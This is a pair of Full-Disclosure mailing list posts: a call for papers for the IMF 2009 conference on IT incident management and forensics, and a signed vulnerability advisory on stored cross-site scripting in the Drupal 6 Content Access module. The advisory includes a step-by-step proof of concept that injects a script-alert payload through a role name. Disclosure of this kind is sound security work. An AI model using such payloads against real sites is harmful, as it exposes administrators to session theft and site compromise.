-- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [IMF 2009] 3rd Call - Deadline Extended
Dear all, the deadline for the submission of papers has been extended. Accepted papers will be published in IEEE Computer Society's Conference Proceedings Series and be available in the IEEE online Digital Library. Please excuse possible cross-postings. 3rd CALL FOR PAPERS IMF 2009 5th International Conference on IT Security Incident Management IT Forensics September 15th - 17th, 2009 Stuttgart, Germany DEADLINE EXTENSION PAPER SUBMISSION The deadline for paper submissions has been extended to June 8th, 2009. Notification of acceptance will be sent on June 22nd. Camera ready paper copies must be submitted until June 26th, 2009. Papers can be submitted via the page found at: http://www.imf-conference.org/imf2009/submission.html Accepted papers will be published in IEEE Computer Society's Conference Proceedings Series and be available in the IEEE online Digital Library. CONFERENCE BACKGROUND = Information and communication technology is more and more becoming an integral and in most cases even a vital part of life. The worldwide economy, public administration, health care, education and even personal life depend on working IT. Constriction of the availability of its service, loss of confidentiality or alteration of data processed, or loss of integrity of the IT infrastructure usually lead to serious or disastrous consequences. Hence security plays an increasingly important role for operators and users of IT systems and infrastructures. The establishment of static security measures like policies, standards, and guidelines slowly but steadily is getting more common amongst IT operators. Nevertheless in the vast majority of cases operators do not have the capability to detect and respond to security incidents or do a forensic analysis of its traces that can be used in a lawsuit. Jurisdiction in most countries is starting to change and applies regulations on legal duty to maintain safety on operators of IT. Hence incident response capabilities become indispensable to avoid successful assertion of claims for damages caused by compromised or misused systems. CONFERENCE GOALS IMF's intent is to gather experts from throughout the world in order to present and discuss recent technical and methodical advances in the fields of IT security incident response and management and IT forensics. The conference provides a platform for collaboration and exchange of ideas between industry, academia, law-enforcement and other government bodies. CONFERENCE TOPICS = The scope of IMF 2009 is broad and includes, but is not limited to the following areas: IT Incident Response * Procedures and Methods of Incident Response * Formats and Standardization for Incident Response * Tools Supporting Incident Response * Incident Analysis * CERTs/CSIRTs * Sources of Information, Information Exchange, Communities * Dealing with Vulnerabilities (Vulnerability Response) * Monitoring and Early Warning * Education and Training * Organizations * Legal Aspects (Jurisdiction, Applicable Laws and Regulations) IT Forensics * Trends and Challenges in IT Forensics * Techniques, Tools in Procedures IT Forensics * Methods for the Gathering, Handling, Processing and Analysis of Digital Evidence * Evidence Protection in IT Environments * Standardization in IT Forensics * Education and Training * Organizations * Legal Aspects (Jurisdiction, Applicable Laws and Regulations) Submission Details == IMF invites to submit full papers of up to 20 pages, presenting novel and mature research results as well as practice papers of up to 20 pages, describing best practices, case studies or lessons learned. Proposals for workshops, discussion and presentation on practical methods and challenges are also welcome. All submissions must be written in English (see below), and either in postscript or PDF format. Authors of accepted papers must ensure that their papers will be presented at the conference. Submitted full papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal or a conference with proceedings. All submissions will be reviewed by the program committee and papers accepted to be presented at the conference will be included in the conference proceedings. Papers can be submitted via the page found at: http://www.imf-conference.org/imf2009/submission.html Details on the electronic submission procedure as well as detailed registration information and formatting instructions are provided on the conference web site (http://www.imf-conference.org).
[Full-disclosure] Drupal 6 Content Access Module XSS
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Details of this disclosure have been posted at http://lampsecurity.org/drupal_6_content_access_xss Vendor Notified: 05/19/2009 Description of Vulnerability: - - Drupal (http://drupal.org) is a robust content management system (CMS) written in PHP and MySQL that provides extensibility through hundreds of third party modules. The Content Access Module (http://drupal.org/project/content_access) suffers from a cross site scripting vulnerability because it does not sanitize role names before displaying them on the 'Access Control' screen of managed content types. This vulnerability is exacerbated by the fact that Drupal 6.12 core does not perform input validation on role names as they are being created. This can lead to a situation where users administering role based access controls of content types could be exposed to malicious HTML content. Systems affected: - - Drupal 6.12 with Content Access 6.x-1.1 was tested and shown to be vulnerable Impact - -- Authenticated users could be exposed to XSS attacks when administering content access. Users with this responsibility are generally site administrators. Cross site scripting attacks against administrators could lead to full web server process compromise. Mitigating factors: - --- In order to carry out the exploit described below the attacker must be able to inject malicious content into role names, which is possible for authenticated users with the 'administer permissions' permission. Other attack vectors may exist that do not require these restricted permissions. Proof of concept: - - 1. Install Drupal 6.12 and Content Access 6.x-1.1 2. Click Administer - User management - Roles 3. Enter scriptalert('xss');/script in the Name textarea 4. Click the Add Role button 5. Observe JavaScript alert 6. Click on Administer - Content Types 7. Click on 'edit' next to any content type 8. Click on 'Access control' link 9. Observe the JavaScript alert multiple times Vendor Response - --- Drupal security was notified of this vulnerability on 5/19/2009. Vendor has declined to issue an official security announcement due to the restricted access rights required to carry out the proof of concept exploit. Vendor has filed a bug with the module maintainer at http://drupal.org/node/472494. - -- Justin C. Klein Keane http://www.MadIrish.net http://LAMPSecurity.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mandriva - http://enigmail.mozdev.org iPwEAQECAAYFAkocV0YACgkQkSlsbLsN1gAQuQb9EYSb+J7eDst+jK/zAEmhqtqY plXxiotJUtNKGCBtcunVAhA1YtQE3OAgAMwvhLvdYwM9d3A+NaQSu74IGrY5Q4rp T1yiJwFW7rTmu3fo1TdSouNr2gZ6sfa5/089Rl4ZxMfiRQPv8jJFMdF65qDpJaaM UNZEfMxUCJXuRVESDDx3P2h0liF0P+1xQiHB4oxsKhkWstV5hk9vhHIiNxjK63sS r+bh0hxlQHUIO4UtWbZgoSeb1+GVip+I3bUjkMNcLre/unagjwaphGaS8CmyuefS +Ic4IUkI5ouAfNSEcPw= =nPoy -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/